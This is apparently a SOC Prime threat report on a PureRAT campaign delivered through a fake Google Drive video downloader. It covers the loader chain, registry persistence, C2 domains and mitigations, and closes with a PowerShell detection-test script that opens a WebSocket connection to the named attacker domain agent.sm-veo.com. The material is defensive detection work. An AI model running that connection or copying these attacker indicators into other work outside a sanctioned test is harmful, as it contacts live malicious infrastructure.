SOC Prime Bias: High

24 Jun 2026 19:37 UTC
newspaper icon lukeacha.com

PureRAT Variant Discovered in AI Video Player

Author Photo
SOC Prime Team linkedin icon Follow
PureRAT Variant Discovered in AI Video Player
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

A malware campaign is using a fake Google Drive-themed video downloader to launch a multi-stage execution chain. The infection moves from a Python-based loader to shellcode and then to a protected .NET assembly identified as PureRAT. The malware relies on heavy obfuscation, custom encryption, and authenticated WebSocket communications to manage command-and-control traffic.

Investigation

The investigation analyzed a staged execution flow that began with a Python bytecode loader. Researchers observed Base85 decoding, zlib decompression, and shellcode injection through VirtualAlloc. Further analysis uncovered a heavily protected .NET loader, Ykzrh/smveo-csharp-agent.exe, which used virtualization and runtime reconstruction to hinder analysis.

Mitigation

Users should be warned against downloading files from unofficial or suspicious video-themed lures. Organizations should monitor for unauthorized Python execution and unusual .NET assembly behavior within local application data directories. Strong application allowlisting and monitoring for suspicious Run key changes can also reduce the risk of compromise.

Response

If this activity is detected, isolate affected endpoints immediately to disrupt further WebSocket-based command-and-control traffic. Investigators should perform memory forensics to capture the decrypted .NET payload and determine the scope of infection. Network logs should also be reviewed for connections to the smveo.com infrastructure, and any potentially exposed credentials should be rotated.

graph TB %% Class Definitions Section classDef action fill:#99ccff classDef malware fill:#ff9999 classDef persistence fill:#99ff99 classDef obfuscation fill:#ffff99 classDef tool fill:#cccccc %% Node definitions act_user_exec[“<b>Action</b> – <b>T1204 User Execution</b><br/>Victim interacts with a lure<br/>disguised as a fake Google Drive<br/>or SMVEO video download.”] class act_user_exec action act_drive_by[“<b>Action</b> – <b>T1189 Drive-by Compromise</b><br/>User downloads malicious file:<br/>DriveVideoSetup-x64-0.1.0.exe.”] class act_drive_by action mal_setup[“<b>Malware</b> – <b>Initial Executable</b><br/>File: DriveVideoSetup-x64-0.1.0.exe<br/>Establishes persistence and<br/>starts deobfuscation chain.”] class mal_setup malware per_registry[“<b>Action</b> – <b>T1547.014 Persistence</b><br/>Modifies registry key:<br/>HKCU\Software\Microsoft\Windows\CurrentVersion\Run”] class per_registry persistence act_deobf[“<b>Action</b> – <b>T1140 Deobfuscate/Decode Files</b><br/>Complex Python stages involving<br/>Base85 decoding, zlib decompression,<br/>and marshal.loads.”] class act_deobf obfuscation tool_donut[“<b>Tool</b> – <b>DonutLoader</b><br/>Mechanism used to execute<br/>shellcode in memory.”] class tool_donut tool mal_ykzrh[“<b>Malware</b> – <b>Ykzrh.exe</b><br/>Highly protected .NET loader<br/>utilizing virtualization.”] class mal_ykzrh malware act_packing[“<b>Action</b> – <b>T1027.002 Software Packing</b><br/>Uses custom bytecode interpreters<br/>and virtualization to hide core logic.”] class act_packing obfuscation mal_purerat[“<b>Malware</b> – <b>PureRAT</b><br/>Core functionality of the attack<br/>hidden via obfuscation.”] class mal_purerat malware act_cert_steal[“<b>Action</b> – <b>T1649 Steal or Forge Authentication Certificates</b><br/>Generates client.crt and client.key<br/>under %LOCALAPPDATA%\SMVEO\.”] class act_cert_steal action comm_c2[“<b>Action</b> – <b>C2 Communication</b><br/>Authenticated WebSocket communication<br/>to agent.sm-veo.com.”] class comm_c2 action %% Connections act_user_exec –>|leads_to| act_drive_by act_drive_by –>|executes| mal_setup mal_setup –>|performs| per_registry mal_setup –>|initiates| act_deobf act_deobf –>|leads_to| tool_donut tool_donut –>|deploys| mal_ykzrh mal_ykzrh –>|utilizes| act_packing act_packing –>|hides| mal_purerat mal_purerat –>|performs| act_cert_steal act_cert_steal –>|facilitates| comm_c2

Attack Flow

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

  • Attack Narrative & Commands: The adversary has successfully deployed a PureRAT variant. To maintain control, the malware establishes a persistent Command and Control (C2) channel. Instead of standard HTTP polling, it utilizes an authenticated WebSocket connection to bypass traditional web proxies that might not inspect long-lived WebSocket streams. The attacker’s goal is to establish a stable, low-latency tunnel to agent.sm-veo.com on port 8443. This simulation will use a PowerShell script to mimic this network behavior by initiating a connection to the malicious URI.

  • Regression Test Script:

    # Simulation of PureRAT Variant C2 via WebSocket
# Goal: Trigger the detection rule via destination domain or URL.

$targetUrl = "wss://agent.sm-veo.com:8443/v1/ws"
$targetDomain = "agent.sm-veo.com"

Write-Host "[+] Starting PureRAT C2 Simulation..." -ForegroundColor Cyan

try {
    Write-Host "[+] Attempting to establish WebSocket connection to $targetUrl"
    # Using a .NET WebSocket client to simulate the specific protocol behavior
    $ws = New-Object System.Net.WebSockets.ClientWebSocket
    $uri = New-Object System.Uri($targetUrl)
    $ct = New-Object System.Threading.CancellationTokenSource

    # We do not need a successful handshake for the network telemetry to trigger,
    # just the attempt to connect to the specified destination.
    $task = $ws.ConnectAsync($uri, $ct.Token)

    # Wait briefly for the connection attempt to generate telemetry
    Start-Sleep -Seconds 5
    Write-Host "[!] Connection attempt completed. Check SIEM for telemetry." -ForegroundColor Green
}
catch {
    Write-Host "[!] Connection failed (Expected if domain is sinkholed/not real), but telemetry should have been generated." -ForegroundColor Yellow
}
finally {
    if ($ws) { $ws.Dispose() }
}

  • Cleanup Commands:

    # No persistent files or registry keys were modified by this specific simulation script.
# If persistence (T1547.001) was simulated, use the following:
# Remove-ItemProperty -Path 'HKCU:SoftwareMicrosoftWindowsCurrentVersionRun' -Name 'PureRAT_Update'
Write-Host "[+] Cleanup complete. No artifacts left by network simulation." -ForegroundColor Cyan

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free